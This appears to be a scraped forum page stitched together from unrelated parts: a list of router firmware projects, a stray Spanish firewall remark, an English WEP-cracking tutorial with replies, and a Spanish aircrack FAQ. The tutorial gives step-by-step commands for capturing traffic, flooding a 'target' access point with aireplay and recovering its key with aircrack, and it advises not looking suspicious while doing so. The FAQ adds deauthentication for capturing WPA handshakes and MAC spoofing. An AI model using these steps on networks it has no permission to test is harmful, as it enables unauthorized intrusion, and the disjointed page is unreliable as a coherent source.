    • FONChillispot-based worldwide Hotspot network. After unsuccessfully attempting to develop a version that supports 2 SSIDs (one private, one public), FON abandoned the WRT54G series, and now distributes a router called La Fonera, which does support 2 SSIDs.
    • FreeWRT – Experimental firmware based on OpenWrt.
    • Freifunk – German software supports wireless mesh networks with OLSR, based on OpenWrt
    • Meraki – Mesh Networking Wifi AP developed thru Roofnet project, based on OpenWrt.[1]
    • OpennetFirmware – Firmware based on OpenWrt and parts of Freifunk.
    • PacketProtector – OpenWrt-based security distribution that includes IDS, IPS, VPN, and web antivirus capabilities
    • TinyPEAP – Secure wireless authentication feature added to Linksys firmware
    • WiFi-Box[9] – (no documentation available as of January 2006)
    • Neighbornode
    • Tarifa[10] – Based on stock WRT54GL firmware.
    • WiFiDog Captive Portal – WiFi Dog by Ile Sans Fil, a Captive Portal software that runs on the OpenWrt platform
    • WifiTastic[11] – Hotspot solution for home or small business use. Features credit card billing. Runs on the OpenWrt platform
    • A project which uses freifunk firmware with chillispot captive portal and authentication.
    • X-Wrt End user extensions to OpenWrt – provides a new web based management interface to OpenWrt. (Linux/GPL)
  • Deprecated projects (no longer maintained)
    • HyperWRT – Original power boost firmware project by Avenger 2.0 to stay close to official WRT54G and WRT54GS firmware but add features such as transmit power, port triggers, scripts, telnet, etc.
      • HyperWRT +tofu – Based on stock WRT54GS firmware, HyperWRT and some additions.
      • Rupan HyperWRT – Based on stock WRT54G firmware and HyperWRT.

Tengo 3 equipos conectados todo el tiempo, mas los que agrego para realizar pruebas o repararlos.

Aca testeas el firewall


Es las versiones posteriores a la que uso yo el puerto 113 en Close en vez de invisible, eso es porque algunos proveedores de inet necesitan la config esa para que los mail se envien bien y tarden menos en realizar la comunicacion.

Cualquier duda que tengas postea.

WEP cracking [In 10mins]

[This tutorial is based from the Whoppix Flash Tut of Wep cracking just in more detail

and ]


Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:

Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1

As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).

Getting Started:

Let’s see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing ‘iwconfig’ in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here . A full list of supported chipsets can
be found on the Kismet website under Documentation.

Changed kismet.conf:

# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.

Save the changes you make and go back to a terminal and run ‘kismet’, it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with ‘W’ if it has WEP enabled it will have a Y, if not it will be a N.

Going in for the kill:

So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting ‘s’ (to sort) then scrolling to the desired Access Point and then typing ‘i’ which gives you detailed info on the Access Point selected.

First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:

If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2

If you use wlan-ng, run
./ start wlan0 [comes with AirePlay2.2]

Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up

Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
[version crap]
usage: ./airodump [mac filter]

./airodump wlan0 linksys

The mac filter is used when you have more than one Access point on the same channel at once, so say you have ‘jim_home’ and ‘linksys’ both essid’s of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting ‘s’ (to sort) then scrolling to the desired Access Point and then typing ‘i’ which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as ‘weak key’ packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a ‘weak key’ packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of ‘weak key’ replies sent out so we can eventually crack the password. So now in your other terminal window ‘cd’ into your aireplay directory and execute aireplay (‘./aireplay'[return]):

capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type – default: 2 = data
-v subt : fc, subtype – default: 0 = normal
-t tods : fc, To DS bit – default: any
-f fromds : fc, From DS bit – default: any
-w iswep : fc, WEP bit – default: 1
-y : don’t ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on

./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0

Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a ‘weak key’ packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit ‘y’ then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit ‘control+c’ in both terminal windows to terminate both aireplay and airodump, now ‘cd’ into your aircrack directory and run aircrack (‘./aircrack'[return]):

aircrack 2.1 – (C) 2004 Christophe Devine
usage: ./aircrack [options]
-d : debug – specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

./aircrack -n 128 linksys.cap

what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.

KEY FOUND: [ Pwn3d ]

Happy WarDriving.

(Please reply with any errors in my tutorial)

Jun 22 2005, 04:24 AM

good job man, this is a great tutorial. most of the tutorials i have seen on the top are ehh very prism based card biased. just my 2c. thanks for this great tut ;]


Jun 22 2005, 05:37 AM

thx 4 tutorial it´s very nice i will test it now

Jun 22 2005, 07:32 AM

Jun 22 2005, 11:23 AM

yes thats the whoppix tutorial, i based this one from that (if you read it, it says in the first 5 lines) i am not trying to steal thunder from whoppix. This tutorial expandes and adds detail to it.

Jun 22 2005, 01:47 PM

nice one UmI. Like the fact Its explained in text too. Flash tuts sometimes arn’t very protable and can miss out more technical detais.

/me adds tut to his achieve smile.gif

belgther: you should read the tutorial before you comment on it tongue.gif

Jun 22 2005, 05:07 PM

QUOTE(belgther @ Jun 22 2005, 07:32 AM)

these guys are trying to get in as full fledged members. there’s no need to always hit the search button and shoot them down. personally, i think it’s explained pretty well.

Jun 24 2005, 10:03 AM

I have a laptop loaded with fedora, Kismet and airsnort on, I can find loads of encrypted networks where I live but im thinking is it too late in the day for me to try and have some fun.

i.e. have all the manufacturers fixed the issue with wep. I don’t want to be sat outside a building or house trying to crack a wep enabled AP when there is no point.

I have heard that you cannot crack Cisco becuase you can not get more than 96 packets or ‘interesting packets’

anyway if anyone can let me know, I would appreciate it.

Jul 6 2005, 10:58 AM

we got some wifi network @ work … thanx sharing that tuto, it’s gonna be usefull to check it they are secure

Documentación Aircrack:

Documentación Aircrack:

Aca tienen dos files para bajar de Rapidshare con los programas :

y Este

¿Qué es aircrack ?

aircrack es una colección de herramientas para la auditoría de redes inalámbricas:

  • airodump: programa para la captura de paquetes 802.11
  • aireplay: programa para la inyección de paquetes 802.11
  • aircrack: crackeador de claves estáticas WEP y WPA-PSK
  • airdecap: desencripta archivos de capturas WEP/WPA

¿Hay un foro de discusión?

Claro: Mira también aircrack en

¿Dónde puedo descargar aircrack ?

La descarga oficial se encuentra en De cualquier modo, si por cualquier motivo no tienes acceso al puerto 8040, puedes usar también este mirror:

Aircrack está incluído en el Troppix LiveCD, que incluye los controladores { Prism2 / PrismGT / Realtek / Atheros / Ralink } parcheados para la inyección de paquetes, así como los controladores acx100 e ipw2200 (Centrino b/g) .

Recibo el mensaje “cygwin1.dll not found” cuando inicio aircrack.exe.

Puedes descargar esta librería de:

Para usar aircrack, arrastra el/los archivo(s) de captura .cap o .ivs sobre aircrack.exe. Si quieres pasarle opciones al programa deberás abrir una consola de comandos (cmd.exe) e introducirlas manualmente; también hay una GUI para aircrack, desarrollada por hexanium.

C:..TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap

Más abajo encontrarás una lista de opciones.

¿Cómo crackeo una clave WEP estática ?

La idea básica es capturar tanto tráfico encriptado como sea posible usando airodump. Cada packete de datos WEP tiene asociado un Vector de Inicialización (IV) de 3-bytes: después de recoger un número suficiente de paquetes de datos, ejecuta aircrack sobre el archivo de captura resultante. Entonces aircrack ejecutará un conjunto de ataques de tipo estadístico desarrollados por un talentoso hacker llamado KoreK.

¿ Cómo sé si mi clave WEP es la correcta ?

Hay dos modos de autenticación WEP:

  • Open-System Authentication: Este es el predeterminadoEl AP acepta todos los clientes, y nunca comprueba la clave: siempre concede la asociación . De todas formas, si tu clave es incorrecta no podrás recibir o enviar paquetes (porque fallará la desencriptación), y pot tanto DHCP, ping, etc. acabarán interrumpiéndose.
  • Shared-Key Authentication: el cliente debe encriptar la petición antes de que le sea concedida la asociación por el AP. Este modo tiene fallas y provoca la recuperación de la clave, por lo que nunca está activado de modo predeterminado.

En resumen, sólo por que parezca que te conectas de forma satisfactoria al AP ¡no significa que tu clave WEP sea la correcta! Para comprobar tu clave WEP, procura desencriptar un archivo de captura con el programa airdecap.

¿Cuántos IVs se necesitan para crackear WEP ?

El crackeo WEP no es una ciencia exacta. El número de IVs necesarios depende de la longitud de la clave WEP, y también de la suerte. Normalmente, una clave WEP de 40-bit puede ser crackeada con 300.000 IVs, y una de 104-bit con 1.000.000 de IVs; teniendo mala suerte se pueden necesitar dos millones de IVs, o más.

No hay ninguna manera de saber la longitud de la clave WEP: esta información está oculta y nunca es anunciada, guardada bien en packetes de gestión, bien en paquetes de datos; como consecuencia, airodump no puede reportar la longitud de la clave WEP. Por ese motivo, se recomienda ejecutar aircrack dos veces: cuando tienes 250.000 IVs, inicias aircrack con “-n 64” para crackear la WEP de 40-bit. Si no la sacas, vuelves a iniciar aircrack (sin la opción -n) para crackear la WEP de 104-bit.

¡Parece que no consigo IVs !

Posibles motivos:

  • Te encuentras demasiado lejos del punto de acceso.
  • No hay tráfico en la red escogida.
  • Hay tráfico de tipo G pero estás capturando en modo B.
  • Hay algún problema con tu tarjeta (¿problema de firmware ?)

Los beacons sólo son “paquetes anuncio” sin encriptar. No sirven para el crackeo WEP.

¡No he podido crackear este AP !

Shit happens.

¿Por qué no hay una versión de aireplay para Windows ?

El controlador PEEK no soporta la inyección de paquetes 802.11; No portaré aireplay a Win32. De todos modos, hay alternativas comerciales:

Tarjetas Prism:

Tarjetas Atheros:

¿Es compatible mi tarjeta con airodump / aireplay ?

Antes de nada, busca en Google para averiguar cuál es el chipset de tu tarjeta. Por ejemplo, si tienes una Linksys WPC54G busca por “wpc54g chipset linux“.


Chipset Soportado por airodump en Windows ? Soportado por airodump en Linux ? Soportado por aireplay en Linux ?
HermesI SÍ (Controlador Agere) SÍ (Controlador orinoco parcheado) NO (el firmware corrompe la cabecera de la MAC)
Prism2/3 NO, puedes buscar en LinkFerret una alternativa SÍ (controlador HostAP o wlan-ng ), firmware STA 1.5.6 o más nuevo necesario SÍ (PCI y CardBus sólo, se recomienda parchear el controlador)
PrismGT SÍ (Controlador PrismGT) FullMAC: SÍ (controlador prism54, SoftMAC: AÚN NO (prism54usb) SÍ (se recomienda parchear el controlador)
Atheros CardBus: Sí (Controlador Atheros), PCI: NO (mira CommView WiFien su lugar) Sí (PCI y CardBus sólo, controlador madwifi) SÍ (es necesario parchear el controlador)
RTL8180 SÍ (controlador Realtek) SÍ (rtl8180-sa2400 controlador) INESTABLE (es necesario parchear el controlador)
Aironet ¿SÍ? (controlador Cisco) SÍ (controlador airo, se recomienda la versión 4.25.30 del firmware) NO (problemas de firmware)
Ralink NO SÍ (controlador rt2500 / rt2570) SÍ (es necesario parchear el controlador)
Centrino b NO PARCIAL: el controlador ipw2100 no descarta los paquetes corruptos NO
Centrino b/g NO SÍ (controlador ipw2200, se recomienda la versión 1.0.6) NO (el firmware desecha paquetes)
Broadcom Sólo los modelos antiguos (Controlador BRCM) NO PROBADO (controlador bcm43xx, necesario Linux >= 2.6.14) NO
TI (ACX100 / ACX111) NO ALFA (controlador acx100) NO
ZyDAS 1201 NO AÚN NO (Controlador zd1211) NO

El controlador PEEK no reconoce mi tarjeta.

Los controladores de Windows arriba mencionados no reconocen algunas tarjetas, incluso teniendo el chipset correcto. En este caso, abre el administrador de dispositivos, selecciona tu tarjeta, “Actualizar el controlador”, selecciona “Instalar desde una ubicación conocida”, selecciona “No buscar, seleccionaré el controlador a instalar”, haz click en “Utilizar disco”, introduce la ruta donde ha sido descomprimido el archivo, deselecciona “Mostrar hardware compatible”, y elige el controlador.

Tengo una tarjeta Prism2, ¡ pero airodump / aireplay parece no funcionar !

Primer paso, asegúrate de que no estás usando el controlador orinoco. Si el nombre de interfaz es wlan0, entonces el controlador es HostAP o wlan-ng. Si el nombre de la interfaz es eth0 o eth1, entonces el controlador es orinoco y debes deshabilitarlo (usa cardctl para averiguar el identificador de tu tarjeta, entonces edita /etc/pcmcia/config, reemplaza orinoco_cs por hostap_cs y reinicia cardmgr).

También puede ser un problema de firmware. Los firmwares antiguos presentan problemas con el test mode 0x0A (usado por los parches para la inyección con HostAP / wlan-ng), por tanto asegúrate de que el tuyo está al día — mira las instrucciones más abajo. La versión recomendada de firmware para la estación es la 1.7.4. Si no funciona bien (kismet o airodump estallan tras capturar un par de paquetes), prueba con la STA 1.5.6 (o bien s1010506.hex para las tarjetas Prism2 más antiguas, o sf010506.hex para las más nuevas).

Como nota aclaratoria, test mode 0x0A es algo inestable con wlan-ng. Si la tarjeta parece atrancarse, tendrás que resetearla, o usar HostAP en su lugar. La inyección sobre dispositivos USB Prism2 está actualmente rota con wlan-ng.

Nota: Aquí pueden encontrar un controlador para Prism2 bajo Windows XP para tarjetas con soporte para WPA/TKIP :

Tengo una tarjeta Atheros, y el parche madwifi provoca un fallo en el kernel /
aireplay dice: enhanced RTC support isn’t available.

Hay algunos problemas con algunas versiones de la rama 2.6 de Linux (especialmente anteriores al 2.6.11) que provocarán un kernel panic al inyectar con madwifi. También, en muchos kernels 2.6 el soporte para RTC mejorado está simplemente roto. Por tanto, está altamente recomendado utilizar un Linux 2.6.11.x o más nuevo.

¿ Cómo actualizo el firmware de mi Prism2 ?

La forma más simple es actualizar mediante WinUpdate – para esto es necesario tener instalado el controlador WPC11 v2.5. Ambos se pueden obtener de:

También se puede actualizar el firmware con el HostAP parcheado (mira más abajo las instrucciones sobre cómo parchear e instalar HostAP). Alternativamente, puedes arrancar el Troppix Live CD (el cuál contiene un controlador hostap ya parcheado y la utilidad prism2_srec).

Ahora que el HostAP está cargado, puedes comprobar el firmware de tu primario y de la estación con este comando:

 dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4 (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

Si el id de NIC se encuentra entre 0x8002 y 0x8008, en ese caso tienes una Prism2 antigua y DEBES usar firmware STA en su versión 1.5.6 (s1010506.hex). De lo contrario, deberías usar PRI 1.1.1 / STA 1.7.4 que es la versión de firmware más estable para las tarjetas Prism2 más nuevas. NO uses firmware 1.7.1 o 1.8.x, la gente ha reportado problemas usándolos.

Para actualizar el firmware, necesitarás prism2_srec del paquete hostap-utils; si no se encuentra ya en el sistema, descarga y compila hostap-utils:

tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0

Algunas tarjetas Prism2 han sido restringidas a un cierto conjunto de canales debido a regulaciones nacionales.Puedes activar los 14 canales con los siguientes comandos:

./prism2_srec wlan0 -D > pda; cp pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)

Por último, descarga el firmware y flashea tu tarjeta. Si el id de NIC está entre 0x8002 y 0x8008:

./prism2_srec -v -f wlan0 s1010506.hex -P pda

De lo contrario:

./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

Si recibes el mensaje “ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported“, el controlador HostAP no está cargado y debes instalarlo. Si recibes el mensaje “ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported“, entonces tu controlador HostAP no ha sido parcheado para soportar la descarga no-volátil.

¿ Qué tarjeta comprar ?

El mejor chipset a día de hoy es Atheros; está muy bien soportado por ambos Windows y Linux. El último parche madwifi hace posible inyectar en bruto paquetes 802.11 tanto en modo Infraestructura (Managed) como Monitor a velocidades b/g.

Ralink hace buenos chipsets, y ha sido muy cooperativo con la comunidad open-source para desarrollar controladores GPL. Ahora la inyección de paquetes está completamente soportada bajo Linux con tarjetas PCI/PCMCIA RT2500, y también funciona en dispositivos USB RT2570.

Aquí hay una lista de tarjetas recomendadas:


Card name Type Chipset Antenna Precio Soporte en Windows Soporte en Linux
MSI PC54G2 PCI Ralink RP-SMA E30 No
MSI CB54G2 CardBus Ralink Interna E30 No
Linksys WMP54G v4 PCI Ralink RP-SMA E40 No
Linksys WUSB54G v4 USB Ralink Interna E40 No
D-Link DWL-G122 USB Ralink Interna E45 No
Netgear WG111 USB PrismGT SoftMAC Interna E40 airodump No
Netgear WG311T PCI Atheros RP-SMA E50 CommView WiFi
Netgear WG511T CardBus Atheros Interna E50 airodump
Netgear WAG511 CardBus Atheros Interna E100 airodump
Proxim 8470-WD CardBus Atheros MC + Int. E110 airodump

Nota: hay algunos modelos más baratos con nombre parecido (WG511, WG311, DWL-650+ y DWL-G520+); esas tarjetas no están basadas en Atheros . Además, el controlador Peek no soporta las tarjetas Atheros recientes, por lo que deberás usar CommView WiFi en su lugar.

¿ Cómo uso airodump en Windows ?

Antes de nada, asegúrate de que tu tarjeta es compatible (mira la tabla de más arriba) y de que tienes instalado el controlador adecuado. También debes descargar peek.dll y peek5.sys y ponerlos en el mismo directorio que airodump.exe.

A la hora de ejecutar airodump, deberías especificar:

  • El número identificador de la interfaz de red, que debe ser elegido de la lista mostrada por airodump.
  • El tipo de interfaz de red (‘o’ para HermesI y Realtek, ‘a’ para Aironet y Atheros).
  • El número de canal, entre 1 y 14. También puedes especificar 0 para altenar entre todos los canales.
  • El prefijo de salida. Por ejemplo, si el prefijo es “foo”, entonces airodump creará foo.cap (paquetes capturados) y foo.txt (estadísticas CSV). Si foo.cap existe, airodump continuará la captura añadiéndole los paquetes.
  • La opción “sólo IVs”. Debe ser 1 si sólamente quieres guardar los IVs de los paquetes de datos WEP. Esto ahorra espacio, pero el archivo resultante (foo.ivs) sólo será útil para el crackeo WEP.

Para parar de capturar paquetes presiona Ctrl-C. Puede que te salga una pantalla azul, debido a un bug en el controlador PEEK por no salir limpiamente de modo monitor. También puede que el archivo resultante de la captura está vacío. La causa de este bug es desconocida.

¿ Por qué no puedo compilar airodump y aireplay en BSD / Mac OS X ?

Ambas fuentes, de airodump y aireplay son específicas de linux. No hay planes de portarlas a otros sistemas operativos.

¿ Cómo uso airodump en Linux ?

Antes de ejecutar airodump, debes iniciar el script para listar las interfaces inalámbricas detectadas.

  uso: airodump 
[canal] [opción IVs]
Especifica 0 como canal para oscilar entre los canales de la banda de los 2.4 GHz.
Pasa la opción de los IVs a 1 para guardar sólo los IVs capturados - el archivo
resultante sólo vale para el crackeo WEP.

Si el demonio gpsd se encuentra funcionando, airodump recogerá y guardará las
coordenadas GPS en formato de texto.

Puedes convertir un archivo .cap / .dump a formato .ivs con el programa pcap2ivs (linux sólo).

Airodump oscila entre WEP y WPA.

Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC inválido). Si es un Centrino b, simplemente no tiene arreglo; ve y compra una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.

¿ Cuál es el significado de los campos mostrados por airodump ?

airodump mostrará una lista con los puntos de acceso detectados, y también una lista de clientes conectados o estaciones (“stations”). Aquí hay un ejemplo de una captura de pantalla usando una tarjeta Prism2 con HostAP:


 BSSID              PWR  Beacons    Data  CH  MB  ENC   ESSID

00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR


00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid


Field Description
BSSID Dirección MAC del punto de acceso.
PWR Nivel de señal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estación la señal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de señal.
Beacons Número de paquetes-anuncio enviados por el AP. Cada punto de acceso envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo que normalmente pueden ser recogidos desde muy lejos.
Data Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs), incluyendo paquetes de datos de difusión general.
CH Número de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se esté alternando entre canales debido a las interferencias de radiofrecuencia.
MB Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b+ y velocidades mayores son 802.11g.
ENC Algoritmo de encriptación en uso. OPN = sin encriptación, “WEP?” = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP (sin la interrogación) indica WEP estática o dinámica, y WPA si TKIP o CCMP están presentes.
ESSID Conocida como “SSID”, puede estar vacía si el ocultamiento de SSID está activo. En este caso airodump tratará de recuperar el SSID de las respuestas a escaneos y las peticiones de asociación.
STATION Dirección MAC de cada estación asociada. En la captura de más arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).

¿ Cómo uno dos archivos de captura ?

Puedes usar el programa mergecap (parte del paquete ethereal-common o la distribución win32):

mergecap -w out.cap test1.cap test2.cap test3.cap

Se puede unir archivos .ivs con el programa “mergeivs” (linux sólo).

¿ Puedo usar Ethereal para capturar paquetes 802.11 ?

Bajo Linux, simplemente prepara la tarjeta para modo Monitor con el script Bajo Windows, Ethereal NO PUEDE capturar paquetes 802.11 .

¿Puede Ethereal decodificar paquetes de datos WEP ?

Sí. Ve a Editar -> Preferencias -> Protocolos -> IEEE 802.11, selecciona 1 en la “WEP key count” e introduce tu clave WEP debajo.

¿ Cómo cambio mi dirección MAC?

Esta operación sólamente es posible bajo Linux. Por ejemplo, si tienes una tarjeta Atheros:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Si no funciona, intenta sacar y re-insertar la tarjeta.

¿ Cómo uso aircrack ?

Usage: aircrack [options]

Puedes especificar múltiples archivos de entrada (tanto en formato .cap como .ivs). También puedes ejectutar airodump y aircrack al mismo tiempo: aircrack se auto-actualizará cuando haya nuevos IVs disponibles.

Aquí hay un sumario con todas las opciones disponibles:


Opción Param. Descripción
-a amode Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA-PSK).
-e essid Si se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Esta opción es necesaria en el caso de que el ESSID no esté abiertamente difundido en un crackeo WPA-PSK (ESSID oculto).
-b bssid Selecciona la red elegida basándose en la dirección MAC.
-p nbcpu En sistemas SMP , especifica con esta opción el número de CPUs.
-q none Activa el modo silencioso (no muestra el estado hasta que la clave es o no encontrada).
-c none (crackeo WEP) Limita la búsqueda a caracteres alfanuméricos sólamente (0x20 – 0x7F).
-d start (crackeo WEP) Especifica el comienzo de la clave WEP (en hex), usado para depuración.
-m maddr (crackeo WEP) Dirección MAC para la que filtrar los paquetes de datos WEP. Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, indiferentemente de la red que sea.
-n nbits (crackeo WEP) Especifica la longitud de la clave: 64 para WEP de 40-bit , 128 para WEP de 104-bit , etc. El valor predeterminado es 128.
-i index (crackeo WEP) Conserva sólo los IVs que tienen este índice de clave (1 a 4). El comportamiento predeterminado es ignorar el índice de la clave.
-f fudge (crackeo WEP) De forma predeterminada, este parámetro está establecido en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor más alto para elevar el nivel de fuerza bruta: el crackeo llevará más tiempo, pero con una mayor posibilidad de éxito.
-k korek (crackeo WEP) Hay 17 ataques de tipo estadístico de korek. A veces un ataque crea un enorme falso positivo que evita que se obtenga la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques de forma selectiva.
-x none (crackeo WEP) No aplicar fuerza bruta sobre los dos últimos keybytes.
-y none (crackeo WEP) Éste es un ataque de fuerza bruta experimental único que debería ser usado cuando el método normal de ataque falle con más de un millón de IVs.
-w words (WPA cracking) Ruta hacia la lista de palabras.

¿ Podrías implementar una opción para reanudar en aircrack ?

No hay planes de implementar esta capacidad.

¿ Cómo puedo crackear un red WPA-PSK ?

Debes capturar hasta que se produzca un “saludo” (handshake) entre un cliente inalámbrico y el punto de acceso. Para forzar al cliente a reautenticarse puedes iniciar un ataque de deautenticación con aireplay. También es necesario un buen diccionario; ver

Para tu información. No es posible pre-computar grandes tablas de Pairwise Master Keys como hace rainbowcrack, puesto que la contraseña está entremezclada con el ESSID.

¿ Será crackeado WPA en el futuro ?

Es extremadamente improbable que WPA sea crackeado del modo que lo ha sido WEP.

El mayor problema de WEP es que la clave compartida está adjunta en el IV; el resultado está vinculado directamente con el RC4. Esta construcción simple superpuesta es propensa a un estaque de tipo estadístico, ya que los primeros bytes del texto cifrado están fuertemente correspondidos con la clave compartida (ver el papel de Andrew Roos). Existen básicamente dos contramedidas a este ataque: 1. mezclar el IV y la clave compartida usando una función para la codificación o 2. descartar los primeros 256 bytes de la salida del RC4.

Ha habido alguna desinformación en las noticias acerca de las fallas de TKIP:

Por ahora, TKIP es razonablemente seguro por sí solo viviendo un tiempo prestado ya que se apoya en el mismo algoritmo RC4 en el que se apoyó WEP.

Realmente, TKIP (WPA1) no es vulnerable: para cada paquete, el IV de 48-bit está mezclado con la clave temporal pairwise de 128-bit para crear una clave RC4 de 104-bit, por lo que no hay ninguna correlación de tipo estadístico . Es más, WPA proporciona contramedidas ante ataques activos (reinyección de tráfico), incluye un mensaje de integridad de código más fuerte (michael), y tiene un protocolo de autenticacaión muy robusto (“saludo” de 4 fases). La única vulnerabilidad a tener en cuenta es el ataque con diccionario, que falla si la contraseña es lo suficientemente robusta.

WPA2 (aka 802.11i) es exactamente lo mismo que WPA1, excepto que usa CCMP (////AES in counter mode////) en lugar de RC4 y HMAC-SHA1 en lugar de HMAC-MD5 para el EAPOL MIC. Como apunte final, WPA2 es un poco mejor que WPA1, pero ninguno de los dos será crackeado en un futuro cercano.

¡ Tengo más de un millón de IVs, pero aircrack no encuentra la clave !

Posibles motivos:

  • Mala suerte: necesitas capturar más IVs. normalmente, una WEP de 104-bit puede ser crackeada con aproximadamente un millón de IVs, aunque a veces se necesitan más IVs.
  • Si todos los votos (votes) parecen iguales, o si hay muchos votos negativos, entonces el archivo con la captura está corrupto, o la clave no es estática (¿se está usando EAP/802.1X ?).
  • Un falso positivo evitó que se obtuviera la clave. Prueba a desactivar cada ataque korek (-k 1 .. 17), sube el nivel de fuerza bruta (-f) o prueba con el ataque inverso experimental único (-y).

He encontrado una clave, ¿cómo desencripto un archivo de captura ?

Puedes usa el programa airdecap :

  uso: airdecap [opciones] 

-l : no elimina la cabecera del 802.11
-b bssid : filtro de dirección MAC del punto de acceso
-k pmk : WPA Pairwise Master Key en hex
-e essid : Identificador en ascii de la red escogida
-p pass : contraseña WPA de la red escogida
-w key : clave WEP de la red escogida en hex


airdecap -b 00:09:5B:10:BC:5A open-network.cap
airdecap -w 11A3E229084349BC25D97E2939 wep.cap
airdecap -e "el ssid" -p contraseña tkip.cap

¿ Cómo recupero mi clave WEP en Windows ?

Puedes usar el programa WZCOOK que recupera las claves WEP de la utilidad de XP Wireless Zero Configuration. Éste es un software experimental, por lo que puede que funcione y puede que no, dependiendo del nivel de service pack que tengas.

¿Recupera WZCOOK también claves WPA ?

WZCOOK mostrará el PMK (Pairwise Master Key), un valor de 256-bit que es el resultado de codificar 8192 veces la contraseña junto con el ESSID y la longitud del ESSID. La contraseña en sí no se puede recuperar — de todos modos, basta con conocer el PMK para conectar con una red inalámbrica protegida mediante WPA con wpa_supplicant (ver el Windows README). Tu archivo de configuración wpa_supplicant.conf debería quedar así:


¿ Cómo parcheo el controlador para la inyección con aireplay ?

Hasta ahora, aireplay sólo soporta la inyección con Prism2, PrismGT (FullMAC), Atheros, RTL8180 y Ralink. La inyección con Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell y Broadcom no está soportada debido a limitaciones en firmware y/o controlador.

